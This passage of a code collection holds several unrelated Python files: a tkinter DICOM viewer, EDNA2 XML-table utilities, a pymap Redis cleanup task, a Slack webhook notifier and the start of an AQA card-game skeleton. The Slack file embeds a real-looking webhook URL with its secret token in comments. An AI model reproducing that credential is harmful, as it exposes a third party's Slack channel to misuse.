name='follow'),\n]\n","sub_path":"user_profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"480523767","text":"import os\nimport re\n#import docx\nimport pandas as pd\nimport tkinter as tk\n#from docx import Document\nfrom tkinter import filedialog\n#from win32com import client as wc\n#from prettytable import PrettyTable\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom PIL import ImageTk,Image\n\nimport copy\nimport numpy as np\nimport cv2\nimport pydicom\nimport SimpleITK as sitk\nfrom mpl_toolkits.mplot3d import Axes3D\nimport sys\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg,NavigationToolbar2Tk\nmatplotlib.use('TkAgg')\nfrom matplotlib.figure import Figure\nimport tkinter.messagebox\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom tkinter import filedialog\nimport skimage\nfrom skimage import measure, feature\n\n\n\ndef get_image(filename,width,height):\n im = Image.open(filename).resize((width,height))\n return ImageTk.PhotoImage(im)\n\ndef loadSerise(filename,id):\n reader = sitk.ImageSeriesReader()#read the DICOM series\n reader.MetaDataDictionaryArrayUpdateOn()#this step loads the public metadata\n reader.LoadPrivateTagsOn()#this step loads the private metadata\n series_IDs = sitk.ImageSeriesReader.GetGDCMSeriesIDs(filename)#get the series IDs from the folder; one folder usually holds all slices of a single patient, split into several series\n\n dicom_names = reader.GetGDCMSeriesFileNames( filename,series_IDs[id])#pick one series ID and get the file names belonging to that series\n reader.SetFileNames(dicom_names)#set the file names\n image3D = reader.Execute()#read the DICOM series\n imgArray=sitk.GetArrayFromImage(image3D)#convert to numpy data\n return imgArray.astype(np.float32)\ndef plot_3d(image, threshold=-300):\n \n # Position the scan upright, \n # so the head of the patient would be at the top facing the camera\n p = image.transpose(2,1,0)\n \n verts, faces = skimage.measure.marching_cubes_classic(p, threshold)\n #verts, faces = measure.marching_cubes(p, threshold)\n plt.subplot(224)\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111, projection='3d')\n\n # Fancy indexing: `verts[faces]` to generate a collection of triangles\n mesh = Poly3DCollection(verts[faces], alpha=0.70)\n face_color = [0.45, 0.45, 0.75]\n mesh.set_facecolor(face_color)\n ax.add_collection3d(mesh)\n\n ax.set_xlim(0, p.shape[0])\n ax.set_ylim(0, p.shape[1])\n ax.set_zlim(0, p.shape[2])\n\n plt.show()\ndef show1(z):\n global templateImg\n global winNew\n global v4\n\n\n\n if v4==0:\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[5,:,:], cmap='gray')\n plt.axis('off')\n if v4==1:\n s1=int(z)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[s1,:,:], cmap='gray')\n plt.axis('off')\n\n\n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #older versions used show(); matplotlib 2.2 and later recommend draw() instead, but show() still works and only prints a warning\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n\ndef show2(z):\n global templateImg\n global winNew\n global v4\n\n\n if v4==0:\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[:,200,:], cmap='gray')\n plt.axis('off')\n if v4==1:\n 
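    # tk.Scale passes the slider position to its command callback as a string, hence the int() cast below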
s1=int(z)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n plt.imshow(templateImg[:,s1,:], cmap='gray')\n plt.axis('off')\n\n\n canvas22=FigureCanvasTkAgg(fig1,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n\ndef show3(z):\n global templateImg\n global winNew\n global v4\n\n\n if v4==0:\n plt.close('all')\n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n plt.imshow(templateImg[:,:,300], cmap='gray')\n plt.axis('off')\n if v4==1:\n s1=int(z)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n plt.imshow(templateImg[:,:,s1], cmap='gray')\n plt.axis('off')\n\n\n canvas33=FigureCanvasTkAgg(fig1,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\ndef show():\n global templateImg\n global winNew\n global fig1\n global fig2\n global fig3\n global fig4\n\n global canvas11\n global canvas22\n global canvas33\n global canvas44\n global v4\n\n s1=v1.get()\n s2=v2.get()\n s3=v3.get()\n\n \n\n print (s1,s2,s3)\n print (v4)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #use the TkAgg backend\n if v4==0:\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[100,:,:], cmap='gray')\n #plt.show()\n #best_frame_raw = templateImg[:,220,:]\n #plt.cla()\n \n fig2=plt.figure(2)\n #plt.imshow(best_frame_raw,cmap='gray')\n #plt.imshow(templateImg[:,510,:], cmap='gray')\n plt.imshow(templateImg[:,200,:], cmap='gray')\n #plt.show()\n fig3=plt.figure(3)\n #plt.imshow(templateImg[:,:,510], cmap='gray')\n plt.imshow(templateImg[:,:,300], cmap='gray')\n #plt.show()\n \n fig4=plt.figure(4)\n four= plt.imread(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png')\n plt.imshow(four)\n \n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #older versions used show(); matplotlib 2.2 and later recommend draw() instead, but show() still works and only prints a warning\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n \n canvas22=FigureCanvasTkAgg(fig2,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n #canvas2.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas33=FigureCanvasTkAgg(fig3,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\n #canvas3.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas44=FigureCanvasTkAgg(fig4,winNew)\n canvas44.draw()\n canvas44.get_tk_widget().place(relx=0.4, rely=0.5, width=350, height=300)\n if v4==1:\n \n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[s1,:,:], cmap='gray')\n plt.axis('off')\n #plt.show()\n #best_frame_raw = templateImg[:,220,:]\n #plt.cla()\n \n fig2=plt.figure(2)\n #plt.imshow(best_frame_raw,cmap='gray')\n #plt.imshow(templateImg[:,510,:], cmap='gray')\n plt.imshow(templateImg[:,s2,:], cmap='gray')\n plt.axis('off')\n #plt.show()\n fig3=plt.figure(3)\n #plt.imshow(templateImg[:,:,510], cmap='gray')\n plt.imshow(templateImg[:,:,s3], cmap='gray')\n plt.axis('off')\n #plt.show()\n \n fig4=plt.figure(4)\n four= plt.imread(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png')\n plt.imshow(four)\n plt.axis('off')\n\n\n \n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #older versions used show(); matplotlib 2.2 and later recommend draw() instead, but show() still works and only prints a warning\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n 
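    # place() pins each canvas at fixed window coordinates; the commented-out pack() call is the geometry-manager alternative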
canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n \n canvas22=FigureCanvasTkAgg(fig2,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n #canvas2.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas33=FigureCanvasTkAgg(fig3,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\n #canvas3.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas44=FigureCanvasTkAgg(fig4,winNew)\n canvas44.draw()\n canvas44.get_tk_widget().place(relx=0.4, rely=0.5, width=350, height=300)\n\ndef main():\n\n filename = filedialog.askdirectory() #get the selected folder\n global templateImg\n global winNew\n global v4\n\n\n v4=0\n \n templateImg = loadSerise(filename,0)\n winNew = tk.Toplevel(w)\n winNew.geometry('1200x800')\n winNew.title('3D View')\n \n \n \n print(templateImg.shape)\n \n matplotlib.use('TkAgg') #use the TkAgg backend\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[100,:,:], cmap='gray')\n #plt.show()\n #best_frame_raw = templateImg[:,220,:]\n #plt.cla()\n \n fig2=plt.figure(2)\n #plt.imshow(best_frame_raw,cmap='gray')\n #plt.imshow(templateImg[:,510,:], cmap='gray')\n plt.imshow(templateImg[:,200,:], cmap='gray')\n #plt.show()\n fig3=plt.figure(3)\n #plt.imshow(templateImg[:,:,510], cmap='gray')\n plt.imshow(templateImg[:,:,300], cmap='gray')\n #plt.show()\n \n fig4=plt.figure(4)\n four= plt.imread(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png')\n plt.imshow(four)\n \n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #older versions used show(); matplotlib 2.2 and later recommend draw() instead, but show() still works and only prints a warning\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n \n canvas22=FigureCanvasTkAgg(fig2,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n #canvas2.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas33=FigureCanvasTkAgg(fig3,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\n #canvas3.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas44=FigureCanvasTkAgg(fig4,winNew)\n canvas44.draw()\n canvas44.get_tk_widget().place(relx=0.4, rely=0.5, width=350, height=300)\n global photo\n #image = Image.fromarray(templateImg[:,:,200])\n photo = ImageTk.PhotoImage(Image.fromarray(templateImg[100,:,:]))\n pic_lb=tk.Label(winNew, image=photo)\n pic_lb.place(relx=0.4, rely=0.5,)\n\n\n \n #pic_lb=tk.Label(winNew, image=photo).grid(row=1, column=1)\n #photo.pack()\n \n #canvas4.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n #show the matplotlib navigation toolbar in the tkinter window\n #toolbar =NavigationToolbar2Tk(canvas1, winNew) #matplotlib 2.2 and later recommend NavigationToolbar2Tk; NavigationToolbar2TkAgg raises a warning\n #toolbar.update()\n #canvas1._tkcanvas.place(relx=0.5, rely=0.9)\n \n t1=tk.Entry(winNew,width=20,textvariable=v1)\n t1.place(relx=0.25,rely=0.4,relwidth=0.05,relheight=0.05)\n \n lb1 = tk.Label(winNew,text='')\n lb1.place(relx=0.75,rely=0.05)\n lb1.config(text='Selected path: '+str(filename))\n text = tk.Text(winNew, width=25, height=15)\n text.place(relx=0.75,rely=0.1)\n text.insert(tk.INSERT, 'Analysis result: '+'\\n')\n \n\n \n t2=tk.Entry(winNew,width=20,textvariable=v2)\n t2.place(relx=0.63,rely=0.4,relwidth=0.05,relheight=0.05)\n #lb2 = tk.Label(winNew,text='y')\n #lb2.place(relx=0.4,rely=0.05)\n \n t3=tk.Entry(winNew,width=20,textvariable=v3)\n 
t3.place(relx=0.25,rely=0.9,relwidth=0.05,relheight=0.05)\n #lb3 = tk.Label(winNew,text='z')\n #lb3.place(relx=0.6,rely=0.05)\n \n scl = tk.Scale(winNew,orient=\"horizontal\",length=200,from_=1,to=245,label='x',tickinterval=244,resolution=1,variable=v1,command=show1)\n scl.place(relx=0.05,rely=0.38)\n sc2 = tk.Scale(winNew,orient=\"horizontal\",length=200,from_=1,to=512,label='y',tickinterval=511,resolution=1,variable=v2,command=show2)\n sc2.place(relx=0.45,rely=0.38)\n sc3 = tk.Scale(winNew,orient=\"horizontal\",length=200,from_=1,to=512,label='z',tickinterval=511,resolution=1,variable=v3,command=show3)\n sc3.place(relx=0.05,rely=0.88)\n\n btClose=tk.Button(winNew,text='Close',command=winNew.destroy)\n btClose.place(relx=0.9,rely=0.9)\n btn = tk.Button(winNew,text=\"OK\",command=show)\n btn.place(relx=0.8,rely=0.9)\n v4=1\n\n \n #plt.subplot(224)\n #plot_3d(templateImg, 300)\n\n \n \n \nw=tk.Tk() \nw.geometry('1000x600') \nw.title(\"Intelligent Fracture Analysis System\") \nl = tk.Label(w, width=50, text='')\nl.pack()\ncanvas_root = tkinter.Canvas(w,width= 800,height=600)\nim_root =get_image(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png',800,600)\ncanvas_root.create_image(400,300,image=im_root)\n#canvas_root.pack()\ncanvas_root.place(relx=0,rely=0)\nwClose=tk.Button(w,text='Close',command=w.destroy)\nwClose.place(relx=0.9,rely=0.9)\ndcm_open=tk.Button(w,text='Select File',command=main)\ndcm_open.place(relx=0.82,rely=0.9)\nm=tk.Menu(w) \nw.config(menu=m) \ninsesrtmenu=tk.Menu(m) \nm.add_cascade(label=\"Import File\",menu=insesrtmenu) \ninsesrtmenu.add_command(label=\" Select Folder\",command=main)\n\nfmenu=tk.Menu(m) \nm.add_cascade(label=\"Analyze\",menu=fmenu) \nfmenu.add_command(label=\"By File\",command=main) \nfmenu.add_command(label=\"By Quantity\",command=main) \nfmenu.add_command(label=\"By Component\",command=main)\nfmenu.add_command(label=\"Multi-condition Query\",command=main)\n#templateImg=tk.Variable()\nv1=tk.Variable()\nv2=tk.Variable()\nv3=tk.Variable()\nv4=tk.Variable()\nif v4==1:\n show()\n#winNew=tk.Variable()\n\n#tk.mainloop()\nif __name__ == \"__main__\":\n if v4==1:\n show()\n\n\n\n","sub_path":"pythongui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":14248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378344407","text":"#\n# Copyright (c) European Synchrotron Radiation Facility (ESRF)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n\n__authors__ = [\"O. 
Svensson\"]\n__license__ = \"MIT\"\n__date__ = \"21/04/2019\"\n\n# Corresponding EDNA code:\n# https://github.com/olofsvensson/edna-mx\n# kernel/src/EDUtilsTable.py\n\nimport json\nimport xmltodict\n\nfrom edna2.utils import UtilsLogging\n\nlogger = UtilsLogging.getLogger()\n\n\ndef getDict(dnaTablesPath):\n with open(str(dnaTablesPath)) as f:\n dnaTables = f.read()\n if \"\" not in dnaTables:\n # Fix for bug in MOSFLM\n dnaTables += \"\"\n orderedDictDnaTables = xmltodict.parse(dnaTables)\n dictDnaTables = json.loads(json.dumps(orderedDictDnaTables))\n return dictDnaTables\n\n\ndef getTables(dictDnaTables, tableName):\n listTables = []\n listTable = dictDnaTables[\"dna_tables\"][\"table\"]\n for table in listTable:\n if tableName == table[\"@name\"]:\n listTables.append(table)\n return listTables\n\n\ndef getListParam(table):\n if isinstance(table[\"list\"], list):\n listParam = table[\"list\"]\n else:\n listParam = [table[\"list\"]]\n return listParam\n\n\ndef getItemValue(dictParameter, key):\n value = None\n if isinstance(dictParameter[\"item\"], list):\n listItem = dictParameter[\"item\"]\n else:\n listItem = [dictParameter[\"item\"]]\n for item in listItem:\n if item[\"@name\"] == key:\n value = item[\"#text\"]\n return _convertFromString(value)\n\n\ndef _convertFromString(value):\n if value is not None:\n try:\n if \".\" in value:\n value = float(value)\n else:\n value = int(value)\n except ValueError:\n # The value is returned as a string...\n pass\n return value\n\n\ndef getListValue(listParameter, key1, key2):\n value = None\n for dictParameter in listParameter:\n if dictParameter[\"@name\"] == key1:\n if isinstance(dictParameter[\"item\"], list):\n for item in dictParameter[\"item\"]:\n if item[\"@name\"] == key2:\n value = item[\"#text\"]\n else:\n value = dictParameter[\"item\"][\"#text\"]\n return _convertFromString(value)\n","sub_path":"edna2/utils/UtilsDnaTables.py","file_name":"UtilsDnaTables.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"220403007","text":"\nfrom __future__ import annotations\n\nimport asyncio\nimport logging\nfrom asyncio import Task\nfrom collections.abc import Awaitable, Callable\nfrom contextlib import AsyncExitStack\nfrom typing import ClassVar, NoReturn\n\nfrom aioredis import Redis, ConnectionClosedError\nfrom pymap.context import connection_exit\n\nfrom .keys import GlobalKeys, CleanupKeys, NamespaceKeys, ContentKeys, \\\n MailboxKeys\nfrom .scripts.cleanup import CleanupScripts\n\n__all__ = ['CleanupTask', 'CleanupThread']\n\n_log = logging.getLogger(__name__)\n_scripts = CleanupScripts()\n\n\nclass CleanupTask:\n \"\"\"Maintains a :class:`CleanupThread` for the duration of the process\n lifetime, restarting on failure.\n\n Args:\n connect_redis: Supplies a connected redis object.\n root: The root redis key.\n\n \"\"\"\n\n #: The delay between redis reconnect attempts, on connection failure.\n connection_delay: ClassVar[float] = 5.0\n\n def __init__(self, connect_redis: Callable[[], Awaitable[Redis]],\n global_keys: GlobalKeys) -> None:\n super().__init__()\n self._connect_redis = connect_redis\n self._global_keys = global_keys\n\n async def _run_forever(self) -> NoReturn:\n while True:\n try:\n async with AsyncExitStack() as stack:\n connection_exit.set(stack)\n redis = await self._connect_redis()\n await CleanupThread(redis, self._global_keys).run()\n except (ConnectionClosedError, OSError):\n pass\n await 
asyncio.sleep(self.connection_delay)\n\n def start(self) -> Task[NoReturn]:\n \"\"\"Return a task running the cleanup loop indefinitely.\"\"\"\n return asyncio.create_task(self._run_forever())\n\n\nclass CleanupThread:\n \"\"\"Defines the logic for monitoring and executing cleanup of various\n entities.\n\n Args:\n redis: The redis connection object.\n global_keys: The global keys group.\n\n \"\"\"\n\n namespace_ttl: ClassVar[int] = 0\n mailbox_ttl: ClassVar[int] = 600\n content_ttl: ClassVar[int] = 3600\n\n def __init__(self, redis: Redis, global_keys: GlobalKeys) -> None:\n super().__init__()\n self._redis = redis\n self._global_keys = global_keys\n self._keys = keys = CleanupKeys(global_keys)\n self._order = (keys.mailboxes, keys.namespaces, keys.contents)\n\n async def run(self) -> NoReturn:\n \"\"\"Run the cleanup loop indefinitely.\n\n Raises:\n :class:`~aioredis.ConnectionClosedError`: The connection to redis\n was interrupted.\n\n \"\"\"\n redis = self._redis\n while True:\n await redis.unwatch()\n cleanup_key, cleanup_val = await redis.blpop(\n *self._order, timeout=0)\n try:\n await asyncio.shield(self._run_one(cleanup_key, cleanup_val))\n except Exception:\n _log.warning('Cleanup failed: key=%s val=%s',\n cleanup_key, cleanup_val, exc_info=True)\n raise\n\n async def _run_one(self, cleanup_key: bytes, cleanup_val: bytes) -> None:\n keys = self._keys\n if cleanup_key == keys.namespaces:\n namespace = cleanup_val\n await self._run_namespace(namespace)\n elif cleanup_key == keys.mailboxes:\n namespace, mailbox_id = cleanup_val.split(b'\\x00', 1)\n await self._run_mailbox(namespace, mailbox_id)\n elif cleanup_key == keys.contents:\n namespace, email_id = cleanup_val.split(b'\\x00', 1)\n await self._run_content(namespace, email_id)\n\n async def _run_namespace(self, namespace: bytes) -> None:\n ns_keys = NamespaceKeys(self._global_keys, namespace)\n await _scripts.namespace(self._redis, self._keys, ns_keys,\n ttl=self.namespace_ttl)\n\n async def _run_mailbox(self, namespace: bytes, mailbox_id: bytes) -> None:\n ns_keys = NamespaceKeys(self._global_keys, namespace)\n mbx_keys = MailboxKeys(ns_keys, mailbox_id)\n await _scripts.mailbox(self._redis, self._keys, mbx_keys,\n ttl=self.mailbox_ttl)\n\n async def _run_content(self, namespace: bytes, email_id: bytes) -> None:\n ns_keys = NamespaceKeys(self._global_keys, namespace)\n ct_keys = ContentKeys(ns_keys, email_id)\n await _scripts.content(self._redis, ns_keys, ct_keys,\n ttl=self.content_ttl)\n","sub_path":"pymap/backend/redis/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341439244","text":"#https://hooks.slack.com/services/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\nimport json\nimport requests\nimport datetime\nfrom dateutil.parser import parse\n\n# Set the webhook_url to the one provided by Slack when you create the webhook at https://my.slack.com/services/new/incoming-webhook/\n# =============================================================================\n# webhook_url = 'https://hooks.slack.com/services/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'\n# slack_data = {'text': \"Sup! 
We're hacking shit together @HackSussex :spaghetti:\"}\n# \n# response = requests.post(\n# webhook_url, data=json.dumps(slack_data),\n# headers={'Content-Type': 'application/json'}\n# )\n# if response.status_code != 200:\n# raise ValueError(\n# 'Request to slack returned an error %s, the response is:\\n%s'\n# % (response.status_code, response.text)\n# )\n# =============================================================================\n \nclass SlackWebHooks:\n def __init__(self, webhook_url, slack_data=None):\n self.webhook_url = webhook_url\n self.slack_data = slack_data\n \n def genSlackData(self, obj):\n attach_obj = {}\n attach_obj['color'] = '#36a64f'\n attach_obj['title'] = obj['iName']\n attach_obj['title_link'] = obj['iLink']\n \n text ='*PRICE:*\\n'+obj['iPrice']+'\\n\\n*STOCK/SIZE:*'\n for size in obj['iSize']:\n text = text + '\\n<' + obj['iLink'] +'|' + size + '>'\n \n #text = text + '\\n\\n*PRICE:*\\n' + obj['iPrice']\n \n attach_obj['text'] = text\n attach_obj['thumb_url'] = obj['iImgURL']\n attach_obj['mrkdwn_in'] = ['text']\n \n \n tmp = {}\n tmp['username'] = \"username\"\n tmp['attachments'] = [attach_obj]\n self.slack_data = tmp\n #print(json.dumps(self.slack_data))\n return json.dumps(self.slack_data)\n \n def sendToSlack(self, obj):\n response = requests.post(\n self.webhook_url, data=self.genSlackData(obj),\n headers={'Content-Type': 'application/json'}\n )\n if response.status_code != 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (response.status_code, response.text)\n )\n \n def genNikeSlackData(self, obj):\n attach_obj = {}\n attach_obj['color'] = '#36a64f'\n attach_obj['title'] = obj['iName']\n attach_obj['title_link'] = obj['iLink']\n \n text = ''\n #adding launch date and status if status is HOLD\n if obj['iExtra']['status'] is not None and obj['iExtra']['status'] == 'HOLD':\n launchDate = parse(obj['iExtra']['launch'])\n text = text + '*LAUNCHING:*\\t\\t\\t*STATUS*\\n'\n text = text + launchDate.strftime('%a %b %d %Y') + '\\t\\t' + obj['iExtra']['status'] + '\\n'\n text = text + launchDate.strftime('%H:%M:%S') + '\\n'\n text = text + 'GMT +0000 (UTC)\\n'\n \n text = text + '*PRICE:*\\n'+obj['iPrice']+'\\n\\n*SIZE:*'\n for size in obj['iSize']:\n text = text + '\\n<' + obj['iLink'] +'|' + size + '>'\n \n #text = text + '\\n\\n*PRICE:*\\n' + obj['iPrice']\n \n attach_obj['text'] = text\n attach_obj['thumb_url'] = obj['iImgURL']\n attach_obj['mrkdwn_in'] = ['text']\n \n \n tmp = {}\n tmp['username'] = \"username\"\n tmp['attachments'] = [attach_obj]\n self.slack_data = tmp\n #print(json.dumps(self.slack_data))\n return json.dumps(self.slack_data)\n \n def sendToNikeSlack(self, obj):\n response = requests.post(\n self.webhook_url, data=self.genNikeSlackData(obj),\n headers={'Content-Type': 'application/json'}\n )\n if response.status_code != 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (response.status_code, response.text)\n )","sub_path":"SlackWebHooks.py","file_name":"SlackWebHooks.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"386868459","text":"# Skeleton Program code for the AQA COMP1 Summer 2014 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA Programmer Team\r\n# developed in the Python 3.2 programming environment\r\n# version 2 edited 06/03/2014\r\n\r\nimport random, datetime\r\n\r\nSameCardLower = 
True\r\nACE_HIGH = True\r\nNO_OF_RECENT_SCORES = 3\r\n\r\n\r\nclass TCard():\r\n def __init__(self):\r\n self.Suit = 0\r\n self.Rank = 0\r\n\r\nclass TRecentScore():\r\n def __init__(self):\r\n self.Name = ''\r\n self.Score = ''\r\n self.Date = ''\r\n\r\nDeck = [None]\r\nRecentScores = [None]\r\nChoice = ''\r\n\r\ndef GetRank(RankNo):\r\n Rank = ''\r\n if RankNo == 1:\r\n Rank = 'Ace'\r\n elif RankNo == 2:\r\n Rank = 'Two'\r\n elif RankNo == 3:\r\n Rank = 'Three'\r\n elif RankNo == 4:\r\n Rank = 'Four'\r\n elif RankNo == 5:\r\n Rank = 'Five'\r\n elif RankNo == 6:\r\n Rank = 'Six'\r\n elif RankNo == 7:\r\n Rank = 'Seven'\r\n elif RankNo == 8:\r\n Rank = 'Eight'\r\n elif RankNo == 9:\r\n Rank = 'Nine'\r\n elif RankNo == 10:\r\n Rank = 'Ten'\r\n elif RankNo == 11:\r\n Rank = 'Jack'\r\n elif RankNo == 12:\r\n Rank = 'Queen'\r\n elif RankNo == 13:\r\n Rank = 'King'\r\n elif RankNo == 14:\r\n Rank = 'Ace'\r\n return Rank\r\n\r\ndef GetSuit(SuitNo):\r\n Suit = ''\r\n if SuitNo == 1:\r\n Suit = 'Clubs'\r\n elif SuitNo == 2:\r\n Suit = 'Diamonds'\r\n elif SuitNo == 3:\r\n Suit = 'Hearts'\r\n elif SuitNo == 4:\r\n Suit = 'Spades'\r\n return Suit\r\n\r\ndef DisplayMenu():\r\n print()\r\n print('-------------------------MAIN MENU-------------------------')\r\n print()\r\n print('1. Play game (with shuffle)')\r\n print('2. Play game (without shuffle)')\r\n print('3. Display recent scores')\r\n print('4. Reset recent scores')\r\n print('5. Options')\r\n print('6. Save Recent Scores')\r\n print('7. Load Recent Scores')\r\n print()\r\n print('Select an option from the menu (or enter q to quit): ', end='')\r\n\r\ndef OptionsMenu():\r\n print(\"-----------------------OPTIONS MENU-------------------------\")\r\n print()\r\n print('1. Ace High / Ace Low')\r\n print('2. Card of same score ends game')\r\n print()\r\n \r\n OptionsMenuChoice = input('Select an option from the menu (or enter q to quit): ')\r\n if OptionsMenuChoice == '1':\r\n ACE_HIGH_CHOICE = input(\"Would you like to set Ace (H)igh / Ace (L)ow? 
:\")\r\n        if ACE_HIGH_CHOICE == 'H':\r\n            global ACE_HIGH\r\n            ACE_HIGH = True\r\n        elif ACE_HIGH_CHOICE == 'L':\r\n            ACE_HIGH = False\r\n    elif OptionsMenuChoice == '2':\r\n        SetSameScore()\r\n\r\ndef SetSameScore():\r\n    global SameCardLower\r\n    Done = False\r\n    while not Done:\r\n        Choice = input(\"Do you want the next card to have the same or lower value as the current card?: \")\r\n        Choice = Choice.upper()\r\n        Choice = Choice[0]\r\n        if Choice == 'S':\r\n            Done = True\r\n            SameCardLower = False\r\n        elif Choice == 'L':\r\n            Done = True\r\n            SameCardLower = True\r\n\r\ndef GetMenuChoice():\r\n    Choice = input()\r\n    Choice = Choice.capitalize()\r\n    if Choice == 'Q' or Choice == 'Quit':\r\n        Choice = 'q'\r\n    print()\r\n    return Choice\r\n\r\ndef LoadDeck(Deck):\r\n    CurrentFile = open('deck.txt', 'r')\r\n    Count = 1\r\n    while True:\r\n        LineFromFile = CurrentFile.readline()\r\n        if not LineFromFile:\r\n            CurrentFile.close()\r\n            break\r\n        Deck[Count].Suit = int(LineFromFile)\r\n        LineFromFile = CurrentFile.readline()\r\n        Deck[Count].Rank = int(LineFromFile)\r\n        if ACE_HIGH == True and Deck[Count].Rank == 1:\r\n            Deck[Count].Rank = 14\r\n        Count = Count + 1\r\n\r\ndef ShuffleDeck(Deck):\r\n    SwapSpace = TCard()\r\n    NoOfSwaps = 1000\r\n    for NoOfSwapsMadeSoFar in range(1, NoOfSwaps + 1):\r\n        Position1 = random.randint(1, 52)\r\n        Position2 = random.randint(1, 52)\r\n        SwapSpace.Rank = Deck[Position1].Rank\r\n        SwapSpace.Suit = Deck[Position1].Suit\r\n        Deck[Position1].Rank = Deck[Position2].Rank\r\n        Deck[Position1].Suit = Deck[Position2].Suit\r\n        Deck[Position2].Rank = SwapSpace.Rank\r\n        Deck[Position2].Suit = SwapSpace.Suit\r\n\r\ndef DisplayCard(ThisCard):\r\n    print()\r\n    print('Card is 